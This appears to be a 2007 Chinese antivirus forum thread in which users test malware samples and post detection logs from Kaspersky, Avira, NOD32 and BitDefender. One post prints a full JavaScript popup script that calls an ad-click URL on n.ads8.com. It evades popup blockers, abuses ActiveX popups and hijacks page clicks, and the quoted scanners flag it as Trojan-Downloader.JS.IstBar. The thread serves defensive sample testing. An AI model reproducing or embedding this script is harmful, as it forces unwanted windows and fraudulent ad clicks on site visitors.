[c9cccf 4f6d7c 8f7935 2355ed]继续4个

jlennon

小邪邪

var click_string='353533312c323039322c313138313837313034382c687474703a2f2f7777772e676a7377772e636f6d2f426f6f6b2f32333137312e617370782c392c312c302c30'; var blankurl='http://n.ads8.com'; var ads_click_test='b40ccfe5ce564fcd774daef8d85c9f2c800b6e4b'; ed_ads_open_class='1'; AdsID='2092'; var totmp=0; if(totmp!=1){ //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// var paypopupURL=""+blankurl+"/pds_k/click.php?click_string="+click_string+"&ads_click_test=b40ccfe5ce564fcd774daef8d85c9f2c800b6e4b"; var usingActiveX = true; function blockError(){return true;} window.onerror = blockError; if (window.SymRealWinOpen){window.open = SymRealWinOpen;} if (window.NS_ActualOpen) {window.open = NS_ActualOpen;} if (typeof(usingClick) == 'undefined') {var usingClick = false;} if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;} if (typeof(popwin) == 'undefined') {var popwin = null;} if (typeof(poped) == 'undefined') {var poped = false;} var blk = 1; var setupClickSuccess = false; var googleInUse = false; var myurl = location.href+'/'; var MAX_TRIED = 20; var activeXTried = false; var tried = 0; var randkey = 'dsd1111'; var myWindow; var popWindow; var setupActiveXSuccess = 0; function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('');popWindow=window.createPopup();popWindow.document.body.innerHTML='
';document.write('');popIframe.document.write('');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}} function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}} function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}} function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'ed_opX_code');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}} function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'ed_opX_code');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}} function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}} function gopop() {if (!poped) {popwin = window.open(paypopupURL,'ed_opX_code');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}} function detectGoogle() {if (usingActiveX) {try {document.write('

');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}} function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf(" Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf(" Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();} version(); function loadingPop() { if(!usingClick && !usingActiveX) { paypopup(); } else if (usingActiveX) {tryActiveX();} else {setupClick();} } myurl = myurl.substring(0, myurl.indexOf('/',8)); if (myurl == '') {myurl = '.';} setupActiveX(); loadingPop(); self.focus(); }

小邪邪

XinDOS

卡巴斯基互联网安全套装6.0The requested URL http://bbs.kafan.cn/attachment.php?aid=87645 is infected with Trojan-Downloader.JS.IstBar.ai virus

蓝色牛仔裤

蜘蛛殺htm 是小概率事件。。。。

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\yoyosf[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  yoyosf[1].zip
    [0] Archive type: ZIP
    --> yoyosf[1].htm
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\ifuckhackerdewife[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  ifuckhackerdewife[1].zip
    [0] Archive type: ZIP
    --> ifuckhackerdewife[1].js
        [DETECTION] Contains suspicious code HEUR/Exploit.HTML
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\mm[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  mm[1].zip
    [0] Archive type: ZIP
    --> mm[1].htm
        [DETECTION] Contains signature of the exploits EXP/Agent.B
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\view[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  view[1].zip
    [0] Archive type: ZIP
    --> view[1].htm

woai_jolin

扫描开始时间: 2007/6/15 12:38:46
扫描日志
NOD32 版本 2330 (20070615) NT
命令行: D:\病毒测试
C:\Program Files\Eset\nod32.exe<病毒 - 正常>
物理磁盘 1 的 MBR 扇区，<病毒 - 正常>
物理磁盘 1 的活动引导扇区，<病毒 - 正常>

日期: 2007年6月15日  时间: 12:38:48
反 Rookits 技术已启用。
已扫描磁盘、文件夹和文件: D:\病毒测试\
D:\病毒测试\ifuckhackerdewife[1].zip ?ZIP ?ifuckhackerdewife[1].js<病毒 - 正常>
D:\病毒测试\ifuckhackerdewife[1].zip:Zone.Identifier<病毒 - 正常>
D:\病毒测试\mm[1].zip ?ZIP ?mm[1].htm<病毒 - VBS/TrojanDownloader.Psyme.NAV 木马> - 是删除目标的一部分
D:\病毒测试\view[1].zip ?ZIP ?view[1].htm<病毒 - 正常>
D:\病毒测试\view[1].zip:Zone.Identifier<病毒 - 正常>
D:\病毒测试\yoyosf[1].zip ?ZIP ?yoyosf[1].htm<病毒 - 正常>
D:\病毒测试\yoyosf[1].zip:Zone.Identifier<病毒 - 正常>
已扫描文件数量: 8
已发现病毒数量: 1
已清除病毒的文件数量: 1
完成时间: 12:38:48 总共扫描时间: 0 秒 (00:00:00)

1688388728

病毒: Trojan-Downloader.JS.Psyme.gw

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn                   病毒: Trojan-Downloader.HTML.Agent.df

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn                   病毒: Trojan-Downloader.JS.IstBar.ai

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn

taihuxian

BitDefender

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.

Trojan.Downloader.JS.Istbar.B
Application.JS.ForcePopup.I
q=Trojan.Downloader.JS.Istbar.B
q=Generic.XPL.ADODB.40627830